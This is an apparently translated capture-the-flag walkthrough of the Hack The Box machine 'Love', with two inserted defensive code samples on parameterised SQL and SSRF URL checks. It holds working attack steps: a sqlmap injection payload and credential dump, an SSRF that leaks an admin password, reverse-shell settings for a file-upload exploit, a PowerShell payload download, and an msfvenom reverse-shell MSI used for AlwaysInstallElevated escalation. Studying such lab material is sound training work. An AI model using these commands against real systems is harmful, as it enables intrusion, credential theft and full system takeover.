Disclaimer
The host penetrated in this article was legitimately authorized. The tools and methods used in this article are for learning and exchange only; please do not use the tools and penetration approaches described here for any illegal purpose. I accept no responsibility for any consequences arising from that, nor for any misuse or damage caused.
Service enumeration
Open port scan
┌──(root💀kali)-[~/htb/Love]
└─# nmap -p- 10.10.10.239 --open 130 ⨯
Starting Nmap 7.92 (https://nmap.org) at 2022-01-10 08:49 EST
Nmap scan report for 10.10.10.239
Host is up (0.38s latency).
Not shown: 64817 closed tcp ports (reset), 699 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5000/tcp open upnp
5040/tcp open unknown
5985/tcp open wsman
5986/tcp open wsmans
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 188.90 seconds
Port details
┌──(root💀kali)-[~/htb/Love]
└─# nmap -sV -Pn -AO 10.10.10.239 -P 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670
Starting Nmap 7.92 (https://nmap.org) at 2022-01-10 08:54 EST
Failed to resolve "80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670".
Failed to resolve "80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670".
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for 10.10.10.239
Host is up (0.40s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Voting System using PHP
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| tls-alpn:
|_ http/1.1
|_http-title: 403 Forbidden
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| FourOhFourRequest, NULL, NotesRPC:
|_ Host '10.10.14.5' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=1/10%Time=61DC3ADA%P=x86_64-pc-linux-gnu%r(NU
SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.5'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFourReq
SF:uest,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.5'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(NotesRPC,49
SF:,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.5'\x20is\x20not\x20allowed\x20
SF:to\x20connect\x20to\x20this\x20MariaDB\x20server");
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (96%), Microsoft Windows Longhorn (95%), Microsoft Windows 10 1709 - 1803 (93%), Microsoft Windows 10 1809 - 1909 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 Update 1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3h01m34s, deviation: 4h37m10s, median: 21m32s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-10T14:17:58
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-10T06:17:59-08:00
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 403.34 ms 10.10.14.1
2 403.58 ms 10.10.10.239
Failed to resolve "80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670".
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.82 seconds
web
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.239
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.239/_22-01-10_08-39-35.txt
Error Log: /root/dirsearch/logs/errors-22-01-10_08-39-35.log
Target: http://10.10.10.239/
[08:39:38] Starting:
[08:40:04] 301 - 337B - /ADMIN -> http://10.10.10.239/ADMIN/
[08:40:04] 301 - 337B - /Admin -> http://10.10.10.239/Admin/
[08:40:14] 301 - 337B - /admin -> http://10.10.10.239/admin/
[08:40:14] 301 - 338B - /admin. -> http://10.10.10.239/admin./
[08:40:15] 200 - 6KB - /admin/
[08:40:15] 403 - 302B - /admin/.htaccess
[08:40:15] 200 - 6KB - /admin%20/
[08:40:16] 302 - 0B - /admin/login.php -> index.php
[08:40:16] 200 - 6KB - /admin/?/login
[08:40:17] 200 - 6KB - /admin/index.php
[08:40:17] 302 - 16KB - /admin/home.php -> index.php
[08:40:37] 301 - 348B - /bower_components -> http://10.10.10.239/bower_components/
[08:40:39] 200 - 7KB - /bower_components/
[08:40:48] 200 - 1KB - /dist/
[08:40:48] 301 - 336B - /dist -> http://10.10.10.239/dist/
[08:40:57] 302 - 0B - /home.php -> index.php
[08:40:58] 301 - 338B - /images -> http://10.10.10.239/images/
[08:40:58] 200 - 2KB - /images/
[08:40:58] 503 - 402B - /examples/
[08:40:59] 200 - 4KB - /index.php
[08:41:00] 200 - 4KB - /index.pHp
[08:41:01] 200 - 4KB - /index.php/login/
[08:41:01] 200 - 4KB - /index.php.
[08:41:01] 200 - 2KB - /includes/
[08:41:01] 301 - 340B - /includes -> http://10.10.10.239/includes/
[08:41:05] 302 - 0B - /login.php -> index.php
[08:41:06] 302 - 0B - /logout.php -> index.php
[08:41:20] 301 - 339B - /plugins -> http://10.10.10.239/plugins/
[08:41:20] 200 - 2KB - /plugins/
Port 80 hosts a web app called Voting System. Search Kali's exploit database for known vulnerabilities in this program:
┌──(root💀kali)-[~/dirsearch]
└─# searchsploit voting system 6 ⨯
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Online Voting System - Authentication Bypass | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi) | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticated) | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE) | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI) | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated) | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection | php/webapps/50052.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There is an unauthenticated RCE; I tried it and it did not work.
There is also an authenticated RCE, but I have no login credentials.
There is also a SQL injection; if the SQL injection exists, we can obtain user credentials and then try the authenticated RCE.
Trying the SQL injection
┌──(root💀kali)-[~/htb/Love]
└─# sqlmap -r data --batch -p voter --level 5 --risk 3
___
__H__
___ ___[.]_____ ___ ___ {1.5.12#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:33:05 /2022-01-10/
[09:33:05] [INFO] parsing HTTP request from 'data'
[09:33:05] [INFO] resuming back-end DBMS 'mysql'
[09:33:05] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.10.239:80/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voter (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: voter=admin'AND (SELECT 4771 FROM (SELECT(SLEEP(5)))YdaT) AND'Vvvd'='Vvvd&password=123&login=asd
---
[09:33:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.27, Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:33:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.239'
[*] ending @ 09:33:08 /2022-01-10/
This confirms a time-based SQL injection in the username field voter.
The following command retrieves all database names:
sqlmap -r data --batch -p voter --level 3 --risk 3 --dbms=mysql --technique=T --dbs
Output:
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] votesystem
Using the same approach, testing step by step, the following command retrieves the user credentials:
sqlmap -r data --batch -p voter --level 3 --risk 3 --dbms=mysql --technique=T -D votesystem -T admin -C username,password --dump
Database: votesystem
Table: admin
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$psrWULJqgpPOl4HUt.ctM.vFMYJjh65EiRFDbIAZsa3z/F3t/8zXW |
+----------+--------------------------------------------------------------+
However, I was unable to crack this password with either john or hashcat.
vhost brute-forcing
Add love.htb to the hosts file:
echo "10.10.10.239 love.htb" >> /etc/hosts
Use gobuster to brute-force subdomains:
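As an added example (not code from the writeup or from the Voting System application), here are the two ways the voter login lookup can be written, run against a constructed in-memory SQLite table; the table name, column names and sample rows are assumptions. The page's own sqlmap payload is fed to both: the concatenated query hands it to the SQL parser (SQLite has no SLEEP() function, so it errors, which is exactly the evidence that the input was parsed as SQL), while the parameterised query treats it as a plain string and simply finds no matching user.

```python
import sqlite3

# Constructed sample rows standing in for the application's login table.
# Table and column names are assumptions, not taken from the application's source.
SAMPLE_ROWS = [("alice", "$2y$10$constructed-hash-for-alice"),
               ("bob", "$2y$10$constructed-hash-for-bob")]

# The voter value sqlmap reported on the page (MySQL time-based payload).
PAGE_PAYLOAD = "admin'AND (SELECT 4771 FROM (SELECT(SLEEP(5)))YdaT) AND'Vvvd'='Vvvd"


def make_db():
    """Build a throwaway in-memory database with the sample login table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE voters (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO voters VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, voter):
    """Vulnerable form: user input is spliced into the query text.

    Whatever the user typed becomes part of the SQL statement, so quotes,
    AND clauses and subqueries in the input are executed as SQL.
    """
    sql = "SELECT username, password FROM voters WHERE username = '" + voter + "'"
    return conn.execute(sql).fetchone()


def lookup_safe(conn, voter):
    """Hardened form: the input travels as a bound parameter.

    The statement is compiled first with a placeholder; the value is attached
    afterwards as data and can never change the statement's structure.
    """
    sql = "SELECT username, password FROM voters WHERE username = ?"
    return conn.execute(sql, (voter,)).fetchone()


def probe(lookup):
    """Classify how a lookup function handles the page's payload.

    Returns 'reached_parser' when the payload was interpreted as SQL
    (SQLite rejects the unknown SLEEP() function at statement compile time)
    and 'treated_as_data' when it was just compared as a string.
    """
    conn = make_db()
    try:
        lookup(conn, PAGE_PAYLOAD)
    except sqlite3.OperationalError:
        return "reached_parser"
    return "treated_as_data"


if __name__ == "__main__":
    print("concatenated query:", probe(lookup_vulnerable))   # reached_parser
    print("parameterised query:", probe(lookup_safe))        # treated_as_data
    print("normal login lookup:", lookup_safe(make_db(), "alice"))
```

Against a real MySQL/MariaDB back end the concatenated form would not error but would sleep for five seconds, which is the timing signal sqlmap measured. The fix is the same regardless of the database driver: bind every user-supplied value as a parameter, and compare the bcrypt hash (the $2y$10$ value dumped above is bcrypt) only after the row has been fetched by exact username.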
┌──(root💀kali)-[~/htb/Love]
└─# gobuster vhost -u love.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://love.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/24 00:57:35 Starting gobuster in VHOST enumeration mode
===============================================================
Found: staging.love.htb (Status: 200) [Size: 5357]
This yields a subdomain: staging.love.htb
Add this domain to the hosts file as well; opening port 80 on it shows a web app called Free File Scanner.
SSRF
The Demo module asks for a URL. I tried writing a PHP file locally, serving it with a simple Python web server, and then fetching the PHP file through the scanner: it could be fetched, but the PHP was not executed.
Try accessing port 80 internally: http://127.0.0.1
Returns the login page.
Try accessing port 443 internally: http://127.0.0.1:443
Returns:
Bad Request
Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead use the HTTPS scheme to access this URL, please.
Try accessing port 5000 internally: http://127.0.0.1:5000
This leaks the admin password:
Vote Admin Creds admin: @LoveIsInTheAir!!!!
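The scanner fetched http://127.0.0.1:5000 on the user's behalf because it accepted any URL at all. As an added example (not part of the writeup or of the Free File Scanner app), here is the destination check a fetcher should run before every request: it restricts the scheme, resolves the host once, and refuses loopback, link-local, private and other non-public ranges. The resolver is injectable so the check runs offline; the hostnames and addresses used in the tests are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _is_non_public(ip):
    """True for any address that points back into the server's own network."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_fetch_url(url, resolve=socket.gethostbyname):
    """Decide whether a user-supplied URL may be fetched server-side.

    Returns (True, resolved_ip) or (False, reason).  `resolve` maps a hostname
    to an IP string; it is a parameter so tests can supply a fake resolver.
    The caller must connect to the returned IP (not re-resolve the name) so a
    DNS answer cannot change between the check and the connection.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        # IP literals (including bracketed IPv6 such as [::1]) need no lookup.
        ip = ipaddress.ip_address(host)
    except ValueError:
        try:
            ip = ipaddress.ip_address(resolve(host))
        except (OSError, ValueError):
            return False, "host does not resolve"
    if _is_non_public(ip):
        return False, f"destination {ip} is not a public address"
    return True, str(ip)


if __name__ == "__main__":
    # Constructed requests like the ones tried against the Demo module above.
    for candidate in ("http://127.0.0.1", "http://127.0.0.1:443",
                      "http://127.0.0.1:5000", "http://[::1]:5000/",
                      "file:///etc/passwd", "http://93.184.216.34/"):
        print(candidate, "->", check_fetch_url(candidate))
```

The same check has to be repeated for every redirect target, since a public host can answer with a 302 to an internal address, and the HTTP client should be configured not to follow redirects on its own. Port 5000 here was the hidden application that leaked the credentials; an allowlist of permitted destination hosts is stricter still than the deny-by-range approach shown.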
Foothold
Now that we have login credentials, we can use the authenticated RCE to get a shell.
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py
The exploit's source code needs the relevant settings edited, and the paths modified:
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.3" # Reverse shell IP
REV_PORT = "4242" # Reverse port
# --------------------------------
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
After running it, a reverse shell is received:
┌──(root💀kali)-[~/htb/Love]
└─# nc -lvnp 4242 1 ⨯
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.239] 53219
b374k shell : connected
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
Privilege escalation
Upload winPEAS to the target:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.3/winPEASx64.exe','c:\Users\Phoebe\Downloads\winPEASx64.exe')"
Registry privilege escalation
Running winPEAS shows the value is 1 under both HKLM and HKCU:
Checking AlwaysInstallElevated
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
This means we can escalate privileges via the registry (Registry Escalation).
Build an MSI file containing a reverse shell:
┌──(root💀kali)-[~/htb/Love]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4444 -f msi -o setup.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of msi file: 159744 bytes
Saved as: setup.msi
Upload it to the target:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.3/setup.msi','c:\Users\Phoebe\Downloads\setup.msi')"
Run the MSI file:
c:\Users\Phoebe\Downloads>.\setup.msi
.\setup.msi
A reverse shell is received:
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Sending stage (175174 bytes) to 10.10.10.239
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.239:53222) at 2022-01-24 02:33:20 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We now have SYSTEM privileges.